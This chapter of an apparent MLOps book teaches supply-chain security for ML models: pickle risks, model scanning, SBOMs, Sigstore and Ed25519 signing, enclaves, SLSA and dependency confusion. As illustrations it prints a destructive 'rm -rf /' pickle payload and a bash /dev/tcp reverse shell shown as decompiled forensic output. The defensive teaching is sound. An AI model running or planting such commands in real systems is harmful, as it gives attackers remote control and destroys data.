Chapter 31.4: DevSecOps & Supply Chain Security
“An ML model is just a binary blob that executes matrix multiplication. Or so we thought, until someone put a reverse shell in the weights file.”
31.4.1. The Model Supply Chain Crisis
In modern MLOps, we rarely train from scratch. We download bert-base from Hugging Face, resnet from TorchVision, and docker images from Docker Hub.
This is a Supply Chain. And it is currently wide open.
The Attack Surface
- Direct Dependency: The
pip install tensorflowpackage. - Model Dependency: The
model.pthfile. - Data Dependency: The S3 bucket with training JPEGs.
- Container Dependency: The
FROM python:3.9base image.
31.4.2. The Pickle Vulnerability (Arbitrary Code Execution)
Python’s pickle module is the standard serialization format for PyTorch (torch.save), Scikit-Learn (joblib), and Pandas.
It is insecure by design.
How Pickle Works
Pickle is a Virtual Machine. It contains opcodes. One of the opcodes is REDUCE, which allows calling any callable function with arguments.
- Normal:
REDUCE(torch.Tensor, [1,2,3])-> Creates a tensor. - Evil:
REDUCE(os.system, ["rm -rf /"])-> Deletes your server.
The Exploit
Hugging Face hosts >500k models. Anyone can upload a .bin or .pth file.
If you load a model from a stranger:
import torch
model = torch.load("downloaded_model.pth") # BOOM! Hacker owns your shell.
This happens instantly upon load. You don’t even need to run inference.
The Solution: Safetensors
Safetensors (developed by Hugging Face) is a format designed to be safe, fast, and zero-copy.
- Safe: It purely stores tensors and JSON metadata. No executable code.
- Fast: Uses memory mapping (
mmap) for instant loading.
Rule: Block all
.pkl,.pth,.binfiles from untrusted sources. Only allow.safetensorsor ONNX.
31.4.3. Scanning your Supply Chain
Just as we scan code for bugs, we must scan models and datasets for threats.
1. ModelScan
A tool to scan model files (PyTorch, TensorFlow, Keras, Sklearn) for known unsafe operators.
pip install modelscan
# Scan a directory
modelscan -p ./downloaded_models
# Output:
# CRITICAL: Found unsafe operator 'os.system' in model.pkl
2. Gitleaks (Secrets in Notebooks)
Data Scientists love Jupyter Notebooks. They also love hardcoding AWS keys in them.
- Problem: Notebooks are JSON. Plaintext scanners often miss secrets inside the
"source": []blocks. - Solution: Use
nbconvertto strip output before committing, and rungitleaksin CI.
3. CVE Scanning (Trivy)
ML Docker images are huge (5GB+) and full of vulnerabilities (old CUDA drivers, system libs).
trivy image pytorch/pytorch:2.0.1-cuda11.7-cudnn8-runtime
# Output: 500 Vulnerabilities (20 Critical).
Mitigation: Use Distroless images or “Wolfi” (Chainguard) images for ML containers to reduce surface area.
31.4.4. SBOM for AI (Software Bill of Materials)
An SBOM constitutes a list of ingredients. For AI, we need an AI-SBOM (or MLBOM).
The CycloneDX Standard
CycloneDX v1.5 added support for ML Models. It tracks:
- Model Metadata: Name, version, author.
- Dataset Ref: Hash of the training set.
- Hyperparameters: Learning rate, epochs.
- Hardware: “Trained on H100”.
Generating an SBOM
Tools like syft can generate SBOMs for containers/directories.
syft dirt:. -o cyclonedx-json > sbom.json
Why it matters
When the next “Log4 Shell” vulnerability hits a specific version of numpy or transformers, you can query your SBOM database: “Show me every model in production that was trained using numpy==1.20.
31.4.5. Model Signing (Sigstore)
How do you know model.safetensors was actually produced by your CI/CD pipeline and not swapped by a hacker?
Signing.
Sigstore / Cosign
Sigstore allows “Keyless Signing” using OIDC identity (e.g., GitHub Actions identity).
Signing (in CI):
# Authenticate via OIDC
cosign sign-blob --oidc-issuer https://token.actions.githubusercontent.com \
./model.safetensors
Verifying (in Inference Server):
cosign verify-blob \
--certificate-identity "https://github.com/myorg/repo/.github/workflows/train.yml" \
--certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
./model.safetensors
If the signature doesn’t match, the model server refuses to load.
31.4.6. Confidential Computing (AWS Nitro Enclaves)
For high-security use cases (Healthcare, Finance), protecting the data in use (in RAM) is required. Usually, the Cloud Provider (AWS/GCP) technically has root access to the hypervisor and could dump your RAM.
Confidential Computing encrypts the RAM. The CPU (AMD EPYC or Intel SGX) holds the keys. Even AWS cannot see the memory.
Architecture: Nitro Enclaves
- Parent Instances: Standard EC2. Runs the web server.
- Enclave: A hardened, isolated VM with NO network, NO storage, and NO ssh. It only talks to the Parent via a local socket (VSOCK).
- Attestation: The Enclave proves to the client (via cryptographic proof signed by AWS KMS) that it is running the exact code expected.
Use Case: Private Interference
- User: Sends encrypted genome data.
- Enclave: Decrypts data inside the enclave, runs model inference, encrypts prediction.
- Result: The Admin of the EC2 instance never sees the genome data.
31.4.7. Zero Trust ML Architecture
Combining it all into a holistic “Zero Trust” strategy.
- Identity: Every model, service, and user has an SPIFFE ID. No IP-based allowlists.
- Least Privilege: The Training Job has write access to
s3://weights, but read-only tos3://data. The Inference Service has read-only tos3://weights. - Validation:
- Input: Validate shapes, types, and value ranges.
- Model: Validate Signatures (Sigstore) and Scan Status (ModelScan).
- Output: Validate PII and Confidence (Uncertainty Estimation).
31.4.9. Deep Dive: Supply-chain Levels for Software Artifacts (SLSA)
Google’s SLSA (pronounced “salsa”) framework is the gold standard for supply chain integrity. We adapt it for ML.
SLSA Levels for ML
- Level 1 (Scripted Build): You have a
train.pyscript. You aren’t just manually running commands in a notebook. - Level 2 (Version Control): The code and config are in Git. The build runs in a CI system (GitHub Actions).
- Level 3 (Verified History): The CI system produces a signed provenance attestation. “I, Github Action #55, produced this
model.safetensors.” - Level 4 (Two-Person Review + Hermetic): All code changes reviewed. Building is hermetic (no internet access during training to prevent downloading unpinned deps).
Implementing SLSA Level 3
Use the slsa-github-generator action.
uses: slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@v1.4.0
with:
base64-subjects: "${{ hash_of_model }}"
upload-assets: true
31.4.10. Air-Gapped & Private Deployments
For Banks and Defense, “Security” means “No Internet.”
The Pattern: VPC Endpoints
You never want your inference server to have 0.0.0.0/0 outbound access.
- Problem: How do you download the model from S3 or talk to Bedrock?
- Solution: AWS PrivateLink (VPC Endpoints).
- Creates a local network interface (ENI) in your subnet that routes to S3/Bedrock internally on the AWS backbone.
- No NAT Gateway required. No Internet Gateway required.
PyPI Mirroring
You cannot run pip install tensorflow in an air-gapped environment.
- Solution: Run a private PyPI mirror (Artifactory / AWS CodeArtifact).
- Process: Security team scans packages -> Pushes to Private PyPI -> Training jobs pull from Private PyPI.
31.4.11. Tool Spotlight: Fickling
We mentioned modelscan. Fickling is a more aggressive tool that can reverse-engineer Pickle files to find the injected code.
Decompiling a Pickle
Pickle is a stack-based language. Fickling decompiles it into human-readable Python code.
fickling --decompile potentially_evil_model.pth
# Output:
# import os
# os.system('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1')
This serves as forensic evidence during an incident response.
31.4.12. Zero Trust Data Access
Security isn’t just about the code; it’s about the Data.
OPA (Open Policy Agent) for Data
Use OPA to enforce matching between User Clearance and Data Classification.
package data_access
default allow = false
# Allow if user clearance level >= data sensitivity level
allow {
user_clearance := input.user.attributes.clearance_level
data_sensitivity := input.data.classification.level
user_clearance >= data_sensitivity
}
Purpose-Based Access Control
“Why does this model need this data?”
- Training: Needs bulk access.
- Inference: Needs single-record access.
- Analyst: Needs aggregated/anonymized access.
31.4.14. Deep Dive: Model Cards for Security
Security is about Transparency. A Model Card (Mitchell et al.) documents the safety boundaries of the model.
Key Security Sections
- Intended Use: “This model is for poetic generation. NOT for medical advice.”
- Out-of-Scope Use: “Do not use for credit scoring.”
- Training Data: “Trained on Public Crawl 2023 (Potential Toxicity).”
- limitations: “Hallucinates facts about events post-2022.”
Automating Model Cards
Use the huggingface_hub Python library to programmatically generate cards in CI.
from huggingface_hub import ModelCard, ModelCardData
card_data = ModelCardData(
language='en',
license='mit',
model_name='fin-bert-v2',
finetuned_from='bert-base-uncased',
tags=['security-audited', 'slsa-level-3']
)
card = ModelCard.from_template(
card_data,
template_path="security_template.md"
)
card.save('README.md')
31.4.15. Private Model Registries (Harbor / Artifactory)
Don’t let your servers pull from huggingface.co directly.
- Risk: Hugging Face could go down, or the model author could delete/update the file (Mutable tags).
- Solution: Proxy everything through an OCI-compliant registry.
Architecture
- Curator: Security Engineer approves
bert-base. - Proxy:
dronerepo.corp.comcachesbert-base. - Training Job:
FROM dronerepo.corp.com/bert-base.
Harbor Config (OCI)
Harbor v2.0+ supports OCI artifacts. You can push models as Docker layers.
# Push Model to OCI Registry
oras push myregistry.com/models/bert:v1 \
--artifact-type application/vnd.model.package \
./model.safetensors
This treats the model exactly like a Docker image (immutable, signed, scanned).
31.4.16. War Story: The PyTorch Dependency Confusion
“We installed
pytorch-helpersand got hacked.”
The Attack
- Concept: Dependency Confusion (Alex Birsan).
- Setup: Company X uses an internal package called
pytorch-helpershosted on their private PyPI. - Attack: Hacker registers
pytorch-helperson the public PyPI with a massive version number (v99.9.9). - Execution: When
pip install pytorch-helpersruns in CI, pip (by default) looks at both Public and Private repos and picks the highest version. It downloaded the hacker’s v99 package.
Not just Python
This attacks NPM, RubyGems, and Nuget too.
The Fix
- Namespace Scoping: Use scoped packages (
@company/helpers). - Strict Indexing: Configure pip to only look at private repo for internal names.
--extra-index-urlis dangerous. Use with caution.
31.4.17. Interview Questions
Q1: What is a “Hermetic Build” in MLOps?
- Answer: A build process where the network is disabled (except for a specific, verified list of inputs). It guarantees that if I run the build today and next year, I get bit-for-bit identical results. Standard
pip installis NOT hermetic because deps change.
Q2: Why is Model Signing separate from Container Signing?
- Answer: Containers change rarely (monthly). Models change frequently (daily/hourly). Signing them separately allows you to re-train the model without rebuilding the heavy CUDA container.
31.4.19. Appendix: Production Model Signing Tool (Python)
Below is a complete implementation of a CLI tool to Sign and Verify machine learning models using Asymmetric Cryptography (Ed25519). This is the foundation of a Level 3 SLSA build.
import argparse
import os
import sys
import hashlib
from cryptography.hazmat.primitives.asymmetric import ed25519
from cryptography.hazmat.primitives import serialization
class ModelSigner:
def __init__(self):
pass
def generate_keys(self, base_path: str):
"""Generates Ed25519 private/public keypair"""
private_key = ed25519.Ed25519PrivateKey.generate()
public_key = private_key.public_key()
# Save Private Key (In production, this stays in Vault/KMS)
with open(f"{base_path}.priv.pem", "wb") as f:
f.write(private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption()
))
# Save Public Key
with open(f"{base_path}.pub.pem", "wb") as f:
f.write(public_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
print(f"Keys generated at {base_path}.priv.pem and {base_path}.pub.pem")
def sign_model(self, model_path: str, key_path: str):
"""Signs the SHA256 hash of a model file"""
# 1. Load Key
with open(key_path, "rb") as f:
private_key = serialization.load_pem_private_key(
f.read(), password=None
)
# 2. Hash Model (Streaming for large files)
sha256 = hashlib.sha256()
with open(model_path, "rb") as f:
while chunk := f.read(8192):
sha256.update(chunk)
digest = sha256.digest()
# 3. Sign
signature = private_key.sign(digest)
# 4. Save Signature
sig_path = f"{model_path}.sig"
with open(sig_path, "wb") as f:
f.write(signature)
print(f"Model signed. Signature at {sig_path}")
def verify_model(self, model_path: str, key_path: str, sig_path: str):
"""Verifies integrity and authenticity"""
# 1. Load Key
with open(key_path, "rb") as f:
public_key = serialization.load_pem_public_key(f.read())
# 2. Load Signature
with open(sig_path, "rb") as f:
signature = f.read()
# 3. Hash Model
sha256 = hashlib.sha256()
try:
with open(model_path, "rb") as f:
while chunk := f.read(8192):
sha256.update(chunk)
digest = sha256.digest()
except FileNotFoundError:
print("Model file not found.")
sys.exit(1)
# 4. Verify
try:
public_key.verify(signature, digest)
print("SUCCESS: Model signature is VALID. The file is authentic.")
except Exception as e:
print("CRITICAL: Model signature is INVALID! Do not load this file.")
sys.exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ML Model Signing Tool")
subparsers = parser.add_subparsers(dest="command")
gen = subparsers.add_parser("keygen", help="Generate keys")
gen.add_argument("--name", required=True)
sign = subparsers.add_parser("sign", help="Sign a model")
sign.add_argument("--model", required=True)
sign.add_argument("--key", required=True)
verify = subparsers.add_parser("verify", help="Verify a model")
verify.add_argument("--model", required=True)
verify.add_argument("--key", required=True)
verify.add_argument("--sig", required=True)
args = parser.parse_args()
signer = ModelSigner()
if args.command == "keygen":
signer.generate_keys(args.name)
elif args.command == "sign":
signer.sign_model(args.model, args.key)
elif args.command == "verify":
signer.verify_model(args.model, args.key, args.sig)
31.4.20. Appendix: Simple SBOM Generator
A script to generate a CycloneDX-style JSON inventory of the current Python environment.
import pkg_resources
import json
import socket
import datetime
def generate_sbom():
installed_packages = pkg_resources.working_set
sbom = {
"bomFormat": "CycloneDX",
"specVersion": "1.4",
"serialNumber": f"urn:uuid:{uuid.uuid4()}",
"version": 1,
"metadata": {
"timestamp": datetime.datetime.utcnow().isoformat(),
"tool": {
"vendor": "MLOps Book",
"name": "SimpleSBOM",
"version": "1.0.0"
},
"component": {
"type": "container",
"name": socket.gethostname()
}
},
"components": []
}
for package in installed_packages:
component = {
"type": "library",
"name": package.project_name,
"version": package.version,
"purl": f"pkg:pypi/{package.project_name}@{package.version}",
"description": "Python Package"
}
sbom["components"].append(component)
return sbom
if __name__ == "__main__":
import uuid
print(json.dumps(generate_sbom(), indent=2))
31.4.21. Summary
DevSecOps is about shifting security left.
- Don’t Pickle: Use Safetensors.
- Scan Everything: Scan models and containers in CI.
- Sign Artifacts: Use Sigstore to guarantee provenance.
- Isolate: Run high-risk parsing (like PDF parsing) in sandboxes/enclaves.
- Inventory: Maintain an SBOM so you know what you are running.
- Air-Gap: If it doesn’t need the internet, cut the cable.
- Private Registry: Treating models as OCI artifacts is the future of distribution.
- Tooling: Use the provided
ModelSignerto implement authentication today.